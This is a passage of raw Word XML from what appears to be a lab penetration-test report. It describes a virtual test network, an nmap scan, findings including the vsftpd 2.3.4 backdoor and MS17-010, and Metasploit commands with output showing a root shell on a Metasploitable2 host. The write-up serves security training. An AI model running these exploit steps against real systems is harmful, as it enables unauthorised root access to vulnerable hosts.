        <w:t>Purpose: Privilege escalation and pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72902007" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="67282C48" w14:textId="77777777" w:rsidR="00DC5A96" w:rsidRDefault="00DC5A96" w:rsidP="00C934DB"/>
    <w:p w14:paraId="1E29B2BE" w14:textId="652C14D5" w:rsidR="00C934DB" w:rsidRPr="005D6CFF" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6CFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.4 Windows 7 (192.168.56.103)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BAE2CA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Role: Internal workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B28F6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Services: SMB, RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F4D71" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Contains synthetic sensitive data (e.g., CustomerDB.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CACD5A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Purpose: Final objective target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434E5B6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="15C9570F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="000A2DAB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2DAB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Operational Execution - Attack Narrative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681D9BDC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Phase 1: Reconnaissance (T1595)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F136B7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>The engagement commenced with passive and active reconnaissance of the target network range 192.168.56.0/24. An Nmap scan was executed from the Kali attacker host (192.168.56.104) to enumerate live hosts, open ports, and service versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACCE49F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Commands Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B6EF1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -O -p- 192.168.56.0/24 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initial_scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="418C02D2" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Key Findings from Reconnaissance:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9242"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C934DB" w14:paraId="4267D7B6" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8579" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="95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87"/>
              <w:gridCol w:w="2026"/>
              <w:gridCol w:w="2850"/>
              <w:gridCol w:w="3055"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C934DB" w14:paraId="7513C131" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="442"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="33550217" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Target IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="5F3DF0FD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Open Ports</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="6653026F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Services Identified</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="19914514" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Notable Finding</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="6FFC90D3" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="989"/>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1E76618" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.101</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54472C5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>21, 22, 23, 25, 80, 139, 445, 3306, 5432</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5DF3D76A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>vsftpd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 2.3.4, OpenSSH, Samba, MySQL, PostgreSQL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E9BF46B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>vsftpd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 2.3.4 - known backdoor CVE-2011-2523</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="01419AE3" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="726"/>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74CD47B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.102</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98046D3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>80, 443, 8080</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792A0C2D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Apache httpd, OWASP BWA applications</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D222065" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Multiple vulnerable web apps including DVWA, </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>WebGoat</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="51C9483D" w14:textId="77777777" w:rsidTr="00D617DD">
              <w:trPr>
                <w:trHeight w:val="705"/>
              </w:trPr>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CDFA1EC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.56.103</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A53C210" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>135, 139, 445, 3389</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3A48B143" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>SMBv1, RDP, Windows 7 SP1</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1C51BD4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>MS17-010 (</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>EternalBlue</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>) - unpatched SMB vulnerability</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="31E53D27" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24CB3317" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="2273C842" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="4ED649B8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00B145B3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A2D9FD" wp14:editId="0A91746A">
            <wp:extent cx="4834493" cy="2679700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="794385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385339" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4855756" cy="2691486"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD6E519" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00B50AE2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="092BAE26" wp14:editId="6BC49EA6">
            <wp:extent cx="4957854" cy="2730500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1101391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391776" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4961626" cy="2732578"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="081FADFA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="000638AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71074501" wp14:editId="3EEF3D8F">
            <wp:extent cx="5010150" cy="2670489"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="566401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401728" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5016665" cy="2673961"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="426204A5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="455909F4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="03DFB195" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00376678" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Phase 2 &amp; 3: Exploit A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(VM 1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00376678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00376678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00376678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 Backdoor RCE on Metasploitable2 (T1190, T1059.004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC4FBC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="687BB862" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="6D5D86AD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Vulnerability Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38049D73" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">CVE-2011-2523: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.3.4 FTP daemon contains a deliberately inserted backdoor. When a username containing a smiley face (:)) is supplied during authentication, the daemon spawns a root shell listener on TCP port 6200. This allows unauthenticated remote code execution as root without any credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24190F55" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Preconditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706DFF73" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Target 192.168.56.101 must have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.3.4 running on TCP port 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EDDB3C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>No firewall blocking outbound connection to port 6200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E005B66" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Network connectivity from attacker (192.168.56.104) to target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF2049" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Exploit Method (High Level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65466E41" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Metasploit module exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ftp/vsftpd_234_backdoor was selected and configured with RHOSTS set to 192.168.56.101. Upon execution, the module sent a malformed authentication string triggering the backdoor condition. A command shell was returned as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A00965E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="63957D6C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00971034">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B197D13" wp14:editId="1BE031D9">
            <wp:extent cx="5731510" cy="3126740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1265100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100556" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3126740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F979F0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Commands (High Level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7E6FF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">                     msf6 &gt; use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F59363" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">                     msf6 &gt; set RHOSTS 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58241322" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                     msf6 &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFED4D7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>[*] Command shell session 1 opened (192.168.56.104:XXXX -&gt; 192.168.56.101:6200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3845FA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">id  =&gt;  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E143B1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="009F1DAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02E513B3" wp14:editId="2931608B">
            <wp:extent cx="5731510" cy="3013710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="442864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864330" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3013710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE95CB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
